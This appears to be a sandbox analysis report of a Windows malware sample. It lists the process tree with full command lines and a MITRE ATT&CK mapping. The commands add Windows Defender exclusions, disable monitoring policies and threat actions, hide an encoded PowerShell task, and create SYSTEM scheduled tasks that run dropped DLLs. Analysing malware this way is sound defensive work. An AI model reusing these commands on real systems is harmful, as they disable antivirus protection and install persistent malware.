"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJMRwiGdhyaHC" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1708

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efiAzqQKrQpqActHLvR" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:1088

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efiAzqQKrQpqActHLvR" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:2320

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PdOICyyFbClqQxVB" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1448

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PdOICyyFbClqQxVB" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:580

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:3304

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1592

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1012

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:2520

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:932

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:2156

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BRWHUqYPU" /t REG_DWORD /d 0 /reg:32
4⤵
- System Location Discovery: System Language Discovery
PID:3056

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BRWHUqYPU" /t REG_DWORD /d 0 /reg:64
4⤵
- System Location Discovery: System Language Discovery
PID:3928

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DsJnIJMlqPUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:3332

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DsJnIJMlqPUn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:3892

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GqgEBhsSxktU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2112

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GqgEBhsSxktU2" /t REG_DWORD /d 0 /reg:64
4⤵
- System Location Discovery: System Language Discovery
PID:2100

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJMRwiGdhyaHC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:3112

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJMRwiGdhyaHC" /t REG_DWORD /d 0 /reg:64
4⤵
PID:3880

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efiAzqQKrQpqActHLvR" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1552

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efiAzqQKrQpqActHLvR" /t REG_DWORD /d 0 /reg:64
4⤵
- System Location Discovery: System Language Discovery
PID:3152

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PdOICyyFbClqQxVB" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2500

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PdOICyyFbClqQxVB" /t REG_DWORD /d 0 /reg:64
4⤵
- System Location Discovery: System Language Discovery
PID:2984

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
4⤵
- System Location Discovery: System Language Discovery
PID:3344

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
4⤵
- System Location Discovery: System Language Discovery
PID:3824

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI" /t REG_DWORD /d 0 /reg:32
4⤵
PID:3300

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI" /t REG_DWORD /d 0 /reg:64
4⤵
- System Location Discovery: System Language Discovery
PID:3444

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
4⤵
PID:3384

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2684

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gTkYDpEUi" /SC once /ST 20:21:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3092

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gTkYDpEUi"
3⤵
- System Location Discovery: System Language Discovery
PID:3504

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gTkYDpEUi"
3⤵
PID:3696

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
3⤵
- System Location Discovery: System Language Discovery
PID:3928

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
4⤵
- System Location Discovery: System Language Discovery
PID:3332

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
3⤵
PID:3916

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
4⤵
PID:3892

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "unWjgiOqmrJvCJdsa" /SC once /ST 01:24:37 /RU "SYSTEM" /TR "\"C:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\OlHGHzZ.exe\" 9Z /YXKfdidWN 385121 /S" /V1 /F
3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:3460

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "unWjgiOqmrJvCJdsa"
3⤵
PID:3352

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 348 -s 540
3⤵
- Loads dropped DLL
- Program crash
PID:1760

C:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\OlHGHzZ.exe
C:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\OlHGHzZ.exe 9Z /YXKfdidWN 385121 /S
2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:3868

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
3⤵
PID:1552

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
4⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:3228

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
5⤵
- System Location Discovery: System Language Discovery
PID:2124

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
6⤵
PID:556

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
4⤵
- Indirect Command Execution
PID:3136

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
5⤵
PID:1508

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
6⤵
- System Location Discovery: System Language Discovery
PID:1388

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
4⤵
- Indirect Command Execution
PID:2500

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
5⤵
- System Location Discovery: System Language Discovery
PID:3068

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
6⤵
- System Location Discovery: System Language Discovery
PID:2496

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
4⤵
- Indirect Command Execution
PID:1700

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
5⤵
PID:2984

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
6⤵
PID:1372

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
4⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:3812

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
5⤵
PID:1228

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:916

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
7⤵
PID:2196

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bAqRDoFVIdSJfWxTlj"
3⤵
PID:2588

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
3⤵
PID:2524

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
4⤵
- Indirect Command Execution
PID:568

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
5⤵
PID:2700

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
PID:1856

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
7⤵
PID:1136

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
4⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:952

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
5⤵
PID:2520

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
PID:1924

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
7⤵
PID:660

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\BRWHUqYPU\PivAYq.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "MHiaqjbnoCNpItK" /V1 /F
3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1588

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "MHiaqjbnoCNpItK2" /F /xml "C:\Program Files (x86)\BRWHUqYPU\kdozuSG.xml" /RU "SYSTEM"
3⤵
- Scheduled Task/Job: Scheduled Task
PID:1864

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "MHiaqjbnoCNpItK"
3⤵
PID:3556

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "MHiaqjbnoCNpItK"
3⤵
PID:584

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "YQZkeEGXXGJdtu" /F /xml "C:\Program Files (x86)\GqgEBhsSxktU2\qDZQbYD.xml" /RU "SYSTEM"
3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2108

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "cosGrOuVCynQy2" /F /xml "C:\ProgramData\PdOICyyFbClqQxVB\AhJiDqs.xml" /RU "SYSTEM"
3⤵
- Scheduled Task/Job: Scheduled Task
PID:3604

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "PZmGxZPxdZZSPZWvU2" /F /xml "C:\Program Files (x86)\efiAzqQKrQpqActHLvR\hQgyTgi.xml" /RU "SYSTEM"
3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1932

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "NzCzwfloobUmvfgYOrr2" /F /xml "C:\Program Files (x86)\OJMRwiGdhyaHC\cNYxSCn.xml" /RU "SYSTEM"
3⤵
- Scheduled Task/Job: Scheduled Task
PID:1136

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "kjGlTxIfJQSbObiUU" /SC once /ST 05:01:17 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\HIoTiJfsoGzpkHVf\yjFQwtwT\tfhfnOY.dll\",#1 /xsXddidr 385121" /V1 /F
3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1920

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "kjGlTxIfJQSbObiUU"
3⤵
PID:3380

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "tvUci1" /SC once /ST 18:45:22 /F /RU "Admin" /TR "\"C:\Program Files\Mozilla Firefox\firefox.exe\""
3⤵
- Scheduled Task/Job: Scheduled Task
PID:3732

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "tvUci1"
3⤵
PID:3336

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "tvUci1"
3⤵
PID:3936

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "unWjgiOqmrJvCJdsa"
3⤵
PID:3480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 1544
3⤵
- Loads dropped DLL
- Program crash
PID:2420

C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\HIoTiJfsoGzpkHVf\yjFQwtwT\tfhfnOY.dll",#1 /xsXddidr 385121
2⤵
PID:2064

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\HIoTiJfsoGzpkHVf\yjFQwtwT\tfhfnOY.dll",#1 /xsXddidr 385121
3⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:3024

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "kjGlTxIfJQSbObiUU"
4⤵
- System Location Discovery: System Language Discovery
PID:3228

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1624443837184565854747565452819301452621085953470-1057448778-2044092830-817923691"
1⤵
PID:2100

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:3916

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1372

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-11042008261123050480849679319-782560941-582638660179606233-1075282566-827124451"
1⤵
PID:2324

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:3280

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indirect Command Execution

T1202

Modify Registry

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion